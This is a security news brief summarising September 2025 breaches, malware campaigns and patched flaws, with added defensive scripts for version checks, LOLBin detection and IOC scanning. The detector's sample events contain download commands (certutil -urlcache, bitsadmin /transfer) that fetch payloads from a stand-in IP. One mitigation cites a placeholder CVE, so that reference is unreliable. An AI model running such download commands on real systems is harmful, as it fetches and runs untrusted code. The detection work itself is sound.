Svoboda Cybersecurity Brief September 19, 2025


Two Scattered Spider Members Charged in UK and US

Two UK teens (19 and 18 years old) linked to Scattered Spider were arrested for hacking Transport for London (TfL) and targeting US healthcare firms (SSM Health, Sutter Health). One faces US charges for 120 network intrusions, extorting $115M in ransoms from 47 US entities.
Impact: Major financial and operational disruption to critical infrastructure.
Mitigation: Strengthen MFA, monitor for social engineering, and enforce least-privilege access.
Source: DataBreaches.net

Survival Flight Suffers Second Breach in Under a Year

The medical transport firm Survival Flight reported a July 2025 breach exposing patient names, addresses, and health insurance data. Hackers (WorldLeaks) claimed 2.8 TB of stolen files. This follows an October 2024 ransomware incident affecting 10,989 patients.
Impact: Repeated healthcare breaches risk patient safety and data integrity.
Mitigation: Audit post-breach safeguards, segment networks, and enforce zero-trust policies.
Source: DataBreaches.net

SystemBC Malware Exploits Unpatched VPS Servers

The SystemBC proxy botnet infects vulnerable VPS servers (on average 20 unpatched flaws per server) to route malicious traffic for ransomware gangs. It operates roughly 1,500 bots per day, fueling proxy services such as REM Proxy and Shopsocks5.
Impact: High-volume proxy traffic enables ransomware, credential theft, and evasion.
Mitigation: Patch critical VPS vulnerabilities (CVE-2025-XXX) and monitor for unusual outbound proxy traffic.
Source: BleepingComputer

Google Patches Sixth Chrome Zero-Day (CVE-2025-10585)

A type confusion flaw in the V8 JavaScript engine (CVE-2025-10585) was exploited in the wild, per Google TAG. Fixed in Chrome 140.0.7339.185/.186. Likely tied to spyware campaigns.
Impact: Remote code execution via crafted HTML.
Mitigation: Update Chrome immediately; disable outdated extensions.
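A quick way to act on the "update Chrome immediately" advice at fleet scale is to compare each host's reported version against the fixed build. The script below is an added example (not from the source article or Google): it parses the output of `google-chrome --version` style strings and flags anything older than 140.0.7339.185, the first fixed build named in the item. The host inventory is constructed sample data.

```python
import re
from typing import Dict, Iterable, Tuple

# First fixed build from the brief (140.0.7339.186 is the same fix on other platforms).
FIXED_VERSION: Tuple[int, ...] = (140, 0, 7339, 185)

# Constructed sample inventory: (hostname, output of `google-chrome --version`).
SAMPLE_INVENTORY = [
    ("ws-001", "Google Chrome 140.0.7339.185"),
    ("ws-002", "Google Chrome 140.0.7339.127"),
    ("ws-003", "Google Chrome 139.0.7258.154"),
    ("ws-004", "Google Chrome 141.0.7390.54"),
]


def parse_chrome_version(text: str) -> Tuple[int, ...]:
    """Extract a four-part Chrome version from a version banner as an int tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no Chrome version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_patched(version_text: str, fixed: Tuple[int, ...] = FIXED_VERSION) -> bool:
    """True when the reported build is at or beyond the fixed build.

    Tuple comparison is lexicographic, so 140.0.7339.127 < 140.0.7339.185
    and 141.x is newer than any 140.x build.
    """
    return parse_chrome_version(version_text) >= fixed


def audit_inventory(inventory: Iterable[Tuple[str, str]]) -> Dict[str, bool]:
    """Map hostname -> needs_update for every host in the inventory."""
    return {host: not is_patched(banner) for host, banner in inventory}


if __name__ == "__main__":
    for host, needs_update in audit_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {'UPDATE REQUIRED' if needs_update else 'ok'}")
```

Feeding it real data is a matter of replacing `SAMPLE_INVENTORY` with whatever your endpoint management tool exports; the comparison logic does not change.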
Source: BleepingComputer

SonicWall Firewall Configurations Exposed in Breach

Hackers used brute-force attacks to access backup firewall configuration files, which contain encrypted credentials, belonging to under 5% of customers. SonicWall urges password resets and VPN key rotation.
Impact: Potential firewall takeover if decrypted.
Mitigation: Import fresh configs, disable exposed VPNs, and audit logs.
Source: The Hacker News

Lotte Card Hack Exposes 3 Million Users in South Korea

Attackers stole 200GB of financial data (virtual payment codes, transaction logs) from Lotte Card’s online payments server (July–Aug 2025). Largest breach in South Korea this year.
Impact: Financial fraud and identity theft risks.
Mitigation: Monitor transactions, enforce payment gateway MFA.
Source: DataBreaches.net

Microsoft Disrupts RaccoonO365 Phishing Service

Microsoft seized 338 domains linked to RaccoonO365, a Nigerian-run service targeting 20+ US healthcare orgs with fake Microsoft 365 login pages.
Impact: Credential theft and lateral movement in healthcare.
Mitigation: Deploy conditional access policies, educate on phishing.
Source: DataBreaches.net

CountLoader Malware Fuels Russian Ransomware Gangs

A new loader with .NET, PowerShell, and JS variants delivers Cobalt Strike and the PureHVNC RAT for LockBit/Qilin affiliates. It targets Ukraine via phishing PDFs.
Impact: Post-exploitation access and data exfiltration.
Mitigation: Block or alert on LOLBin abuse (certutil/bitsadmin); monitor the user Music folder for unexpected files.
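The two mitigations above (watch for certutil/bitsadmin misuse, watch the Music folder) translate directly into a process-creation detection. The script below is an added example, not code from the source article or from any vendor: it runs a small rule set over constructed Sysmon-style process events (flattened here to `key=value` pairs separated by `|`; the real event format is assumed to be normalized to this shape beforehand) and flags LOLBins given download-style arguments, LOLBins writing into a user's Music folder, and executables launched from that folder.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 fields, flattened).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\u\\Music\\a.txt"
    "|ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil.exe -hashfile C:\\setup.msi SHA256"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\bitsadmin.exe"
    "|CommandLine=bitsadmin /transfer job /download /priority high http://203.0.113.7/p.bin C:\\Users\\u\\Music\\p.bin"
    "|ParentImage=C:\\Windows\\System32\\wscript.exe",
    "Image=C:\\Users\\u\\Music\\p.bin.exe"
    "|CommandLine=p.bin.exe"
    "|ParentImage=C:\\Windows\\System32\\wscript.exe",
    "Image=C:\\Program Files\\Git\\bin\\git.exe"
    "|CommandLine=git pull"
    "|ParentImage=C:\\Windows\\explorer.exe",
]

# LOLBins named in the brief; extend with your own list as needed.
LOLBINS = {"certutil.exe", "bitsadmin.exe"}
# Arguments that turn these tools into downloaders (benign uses such as -hashfile do not match).
NETWORK_ARGS = re.compile(r"(-urlcache|/transfer|/download|https?://)", re.IGNORECASE)
# Any path under a per-user Music folder.
MUSIC_DIR = re.compile(r"\\Users\\[^\\]+\\Music\\", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened 'k=v|k=v' event into a dict (values may contain '=')."""
    return dict(field.split("=", 1) for field in line.split("|"))


def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of rule names that fire for one event (empty if benign)."""
    reasons: List[str] = []
    image_path = event.get("Image", "")
    image = PureWindowsPath(image_path).name.lower()
    cmdline = event.get("CommandLine", "")

    if image in LOLBINS and NETWORK_ARGS.search(cmdline):
        reasons.append(f"{image} invoked with download arguments")
    if MUSIC_DIR.search(image_path):
        reasons.append("executable launched from user Music folder")
    elif image in LOLBINS and MUSIC_DIR.search(cmdline):
        reasons.append("LOLBin writing into user Music folder")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every event through the rules and collect the ones that fire."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings.append({"image": event["Image"], "parent": event.get("ParentImage", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["image"], "<-", finding["parent"])
        for reason in finding["reasons"]:
            print("   *", reason)
```

The second sample event (`certutil -hashfile`) is there on purpose: a rule that alerts on every certutil launch drowns the analyst, so the network-argument filter is what keeps the signal usable.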
Source: The Hacker News

SilentSync RAT Hidden in PyPI Packages

Malicious PyPI packages (sisaws, secmeasure) dropped the SilentSync RAT, which steals browser data (Chrome/Firefox) and supports screenshot capture and file exfiltration.
Impact: Supply chain compromise via developer tooling.
Mitigation: Scan for the published IOCs (e.g. 200.58.107[.]25) and audit Python dependencies for the named packages.
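Both halves of that mitigation are mechanical enough to script. The example below is added here and is not code from the source article: it audits a `pip freeze` style dependency list for the two package names in the item and scans connection logs for the defanged IP after refanging it. The dependency list and log lines are constructed sample data; the log field layout (`dst=` / `dport=`) is an assumed format.

```python
import re
from typing import Dict, Iterable, List

# Package names from the brief; add more as new reports name them.
FLAGGED_PACKAGES = {"sisaws", "secmeasure"}
# IOC from the brief, kept defanged in config so it is never accidentally clickable.
DEFANGED_IOCS = ["200.58.107[.]25"]

# Constructed sample `pip freeze` output.
SAMPLE_FREEZE = """\
requests==2.32.3
# internal tooling
sisaws==0.1.0
numpy==2.1.0
Sec_Measure_Compat==1.0
"""

# Constructed sample egress log lines (assumed key=value layout).
SAMPLE_LOGS = [
    "2025-09-18T10:01:02Z host=dev-01 dst=200.58.107.25 dport=443 action=allow",
    "2025-09-18T10:01:05Z host=dev-01 dst=203.0.113.10 dport=443 action=allow",
    "2025-09-18T10:02:11Z host=dev-02 dst=200.58.107.250 dport=8080 action=allow",
]

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def refang(ioc: str) -> str:
    """Turn the defanged form 'a.b.c[.]d' back into a matchable IP."""
    return ioc.replace("[.]", ".")


def normalize_name(name: str) -> str:
    """PyPI treats names case-insensitively and '_' and '-' as equivalent."""
    return name.strip().lower().replace("_", "-")


def parse_freeze(text: str) -> Dict[str, str]:
    """Parse 'name==version' lines into {normalized_name: version}."""
    deps: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, version = line.partition("==")
        deps[normalize_name(name)] = version.strip()
    return deps


def find_flagged(deps: Dict[str, str], flagged: Iterable[str] = FLAGGED_PACKAGES) -> List[str]:
    """Exact-name matches only; near-miss names are reported separately by callers if wanted."""
    wanted = {normalize_name(n) for n in flagged}
    return sorted(name for name in deps if name in wanted)


def find_ioc_hits(log_lines: Iterable[str], iocs: Iterable[str] = DEFANGED_IOCS) -> List[str]:
    """Return log lines containing a flagged IP as a whole address (no prefix matches)."""
    targets = {refang(i) for i in iocs}
    return [line for line in log_lines if any(ip in targets for ip in IPV4.findall(line))]


if __name__ == "__main__":
    print("flagged packages:", find_flagged(parse_freeze(SAMPLE_FREEZE)))
    for hit in find_ioc_hits(SAMPLE_LOGS):
        print("IOC hit:", hit)
```

The third log line (`200.58.107.250`) is included to show why the IP is extracted as a whole token and compared exactly rather than searched as a substring: a plain `"200.58.107.25" in line` check would flag it as a false positive.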
Source: The Hacker News

Tiffany Gift Card Data Breach

Luxury retailer Tiffany & Co. disclosed a May 2025 breach exposing gift card PINs and sales data for 2,500+ customers. Possibly linked to Scattered Spider’s Salesforce attacks.
Source: SecurityWeek

RevengeHotels Deploys AI-Generated Malware

The TA558 group now uses AI-generated JS/PowerShell scripts to deploy VenomRAT in hotels, with a focus on Brazil. Infection occurs via USB drives carrying a file named My Pictures.exe.
Impact: Persistent access to guest payment systems.
Mitigation: Block USB executables, train staff on invoice scams.
Source: SecurityWeek

GhostAction Attack Compromised PyPI Tokens

3,300+ secrets (npm, AWS, DockerHub) were stolen via malicious GitHub Actions workflows. PyPI revoked the affected tokens; no malware was published.
Impact: Potential supply chain hijacking.
Mitigation: Migrate to short-lived “Trusted Publishers” tokens.
Source: BleepingComputer

Medical Associates of Brevard Breach Impacts 246K

BianLian ransomware stole PHI and HR records in January 2025. The attackers had access for weeks before detection.
Source: SecurityWeek

WatchGuard Fixes Critical Firewall Flaw (CVE-2025-9242)

An out-of-bounds write bug in the IKEv2 VPN code of Fireware OS allows remote code execution. Patched versions: 12.3.1_Update3 and 12.5.13.
Impact: Unauthenticated remote code execution.
Mitigation: Update or disable IKEv2 VPN dynamic peers.
Source: BleepingComputer
